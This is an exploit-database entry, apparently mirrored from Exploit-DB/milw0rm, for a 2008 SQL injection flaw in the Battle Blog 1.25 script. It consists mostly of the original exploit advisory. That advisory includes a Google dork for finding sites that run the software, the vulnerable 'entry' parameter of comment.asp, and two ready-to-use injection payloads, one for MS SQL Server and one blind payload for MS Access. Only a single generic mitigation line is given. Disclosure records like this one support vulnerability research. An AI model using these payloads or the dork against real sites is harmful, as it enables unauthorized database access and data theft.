Battle Blog - exploit.company

vendor:

Battle Blog

by:

Bl@ckbe@rD ('Tunisian TerrorisT')

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Battle Blog

Affected Version From: 1.25

Affected Version To: 1.25

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Battle Blog <= V 1.25

The Battle Blog script is vulnerable to SQL injection. Attackers can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'entry' in the 'comment.asp' page. For MS SQL Server, the payload 22+and+1=convert(int,(select+@@version))-- can be used. For Ms ACCESS, the payload IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00 can be used.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

+************************************************************************************************************************+
| hhh  hhh          aa          ccccccc      kk  k      EEEEEEEE       RRRR                    TTTTTTTT      NNN   NN    |
| hhh  hhh        aa  aa        cc           kk k       E              RR  R    -----------       TT         NN N  NN    |
| hhhhhhhh       aaaaaaaa       cc           kkk        EEEEEEE        RR R     -----------       TT         NN  N NN    |
| hhh  hhh     aa       aa      cc           kk k       E              RR  R                      TT         NN   NNN    |
| hhh  hhh    aa         aa     ccccccc      kk  k      EEEEEEE        RR   R                     TT         NN    NN    |
|                                                                                                                        |
+************************************************************************************************************************+

[+] Script Name    : Battle Blog <= V 1.25

[+] Script In Short: ('Battle Blog's "real world" preview feature allows you to view your posting within the actual context of your presentation and customized style sheet before you've published it, or, while you're making edits to a current entry.');

[+] Found by       : Bl@ckbe@rD ('Tunisian TerrorisT') ;

[+] Google dork    : "Powered by Battle Blog" ;

[+] Script URL     : webscripts.softpedia.com/script/Blog/Battle-Blog--31261.html ;

[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;

--//-->

[+] Expl0iT :

/comment.asp?entry={SQL}

-----> For MS SQL Server         : 22+and+1=convert(int,(select+@@version))--

-----> For Ms ACCESS (Blind-Way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00

--//-->

[+] GrEEtZ : allah , hak3r-b0y , UnderZ0ne Crew , InjEct0rS Team 

# milw0rm.com [2008-06-03]